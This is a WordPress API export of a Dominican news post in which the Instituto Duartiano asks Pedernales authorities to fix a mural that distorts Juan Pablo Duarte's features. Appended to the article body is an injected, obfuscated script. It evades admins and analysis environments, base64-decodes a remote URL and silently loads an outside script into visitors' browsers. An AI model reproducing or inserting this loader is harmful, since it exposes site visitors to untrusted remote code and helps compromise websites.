{"id":13075,"date":"2023-01-05T10:04:36","date_gmt":"2023-01-05T14:04:36","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13075"},"modified":"2023-01-05T10:04:36","modified_gmt":"2023-01-05T14:04:36","slug":"instituto-duartiano-insta-corregir-pintura-distorsionada-de-duarte-en-pedernales","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13075","title":{"rendered":"Instituto Duartiano insta corregir pintura distorsionada de Duarte en Pedernales"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/pais\/instituto-duartiano-insta-corregir-pintura-distorsionada-del-duarte-en-pedernales\/\" data-title=\"Instituto Duartiano insta corregir pintura distorsionada de Duarte en Pedernales\" data-description=\"El presidente del Instituto Duartiano, doctor Wilson G\u00f3mez Ram\u00edrez, inst\u00f3 a las autoridades municipales que representan al gobierno\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-faec9d40-a279-4657-88ac-87419acbd56b\">\n<div class=\"at-share-btn-elements\"><strong>Santo Domingo.<\/strong>\u00a0El presidente del Instituto Duartiano,\u00a0Wilson G\u00f3mez Ram\u00edrez,\u00a0inst\u00f3 a las autoridades municipales que representan al gobierno central en Pedernales a corregir una pintura de\u00a0Juan Pablo Duarte, que se exhibe en el parque Central de esa ciudad, donde se muestra al patricio sus rasgos f\u00edsicos distorsionados.<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<p>El titular del organismo deplor\u00f3 esta imagen que, seg\u00fan dijo, no se corresponde con las caracter\u00edsticas faciales del padre de la patria, y la defini\u00f3 como profanaci\u00f3n que quebranta los art\u00edculos 6 y 7 de la Ley 127-01, de fecha 27 de julio de 2001.<\/p>\n<div id=\"\" class=\"mmc_ads \">\n<div id=\"div-gpt-ad-4168228244936-mmc\" class=\"\" data-google-query-id=\"CJibjvDLsPwCFRoVswAdGZ8Pvg\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_EyM_MediumBanner_InContent_1_0__container__\">El presidente del Instituto Duartiano exhort\u00f3 a las autoridades municipales de todo el pa\u00eds a hacer un mayor esfuerzo por salvaguardar los espacios p\u00fablicos y los monumentos patri\u00f3ticos, por medio de una mayor vigilancia y control.<\/div>\n<\/div>\n<\/div>\n<p>G\u00f3mez Ram\u00edrez dijo que \u201cesta pintura del fundador de la Rep\u00fablica, Juan Pablo Duarte y D\u00edez, que hicieron desconocidos en un mural en el parque Central de Pedernales, y que dio lugar a un intento de restauraci\u00f3n, dista de los rasgos fison\u00f3micos del patricio\u201d.<\/p>\n<p>La entidad patri\u00f3tica solicit\u00f3 a las autoridades municipales del Gobierno Central a los fines de corregirlo a la mayor brevedad para cesar este agravio a la imagen de Duarte, con la cual se incurre en la violaci\u00f3n. de los art\u00edculos 6 y 7 de la Ley No. 127-01, de fecha 27 de julio de 2001.<\/p>\n<p>Precis\u00f3 que, si hay una respuesta r\u00e1pida por parte de las autoridades pedernalenses, entonces una delegaci\u00f3n del organismo patri\u00f3tico se trasladar\u00e1 a la referida provincia fronteriza a corregir la ominosa situaci\u00f3n.<\/p>\n<p>Por \u00faltimo, G\u00f3mez Ram\u00edrez enfatiz\u00f3 que \u201cbajo ninguna circunstancia podemos aceptar estos irrespetos, y corresponde a las autoridades policiales y del Ministerio P\u00fablico investigar a fondo estos desmanes para someter a la acci\u00f3n de la Justicia a quienes, como consecuencia de dichas investigaciones, resulten con su responsabilidad penal comprometida\u201d.<\/p>\n<p><strong>Sobre el Instituto Duartiano<\/strong><\/p>\n<p>El Instituto Duartiano es un organismo de car\u00e1cter oficial y aut\u00f3nomo, fundado el 26 de enero de 1964, y la Ley n\u00famero 127-01, del 27 de julio de 2001, le otorg\u00f3 autonom\u00eda.<\/p>\n<p>Tiene como objetivo promover la historia, los ideales, los valores y el ejemplo del patricio Juan Pablo Duarte. Es la instituci\u00f3n responsable de la difusi\u00f3n de la vida y los ejemplos del Padre de la Patria, as\u00ed como la gloriosa historia de los dominicanos.<\/p>\n<p>Tiene la misi\u00f3n de llevar al pueblo dominicano la historia de Juan Pablo Duarte y tratar de que, por medio del conocimiento de sus ideales, laboriosidad, honestidad acrisolada, patriotismo, esp\u00edritu de servicio y vida ejemplar, exista un mejor ciudadano y una patria justa y feliz, como la so\u00f1\u00f3 el padre de la Patria.<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.\u00a0El presidente del Instituto Duartiano,\u00a0Wilson G\u00f3mez Ram\u00edrez,\u00a0inst\u00f3 a las autoridades municipales que representan al gobierno central en Pedernales a corregir una pintura de\u00a0Juan Pablo Duarte, que se exhibe en el parque Central de esa ciudad, donde se muestra al patricio sus rasgos f\u00edsicos distorsionados. El titular del organismo deplor\u00f3 esta imagen que, seg\u00fan dijo, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13077,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13075","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13075","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13075"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13075\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13077"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13075"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13075"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13075"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}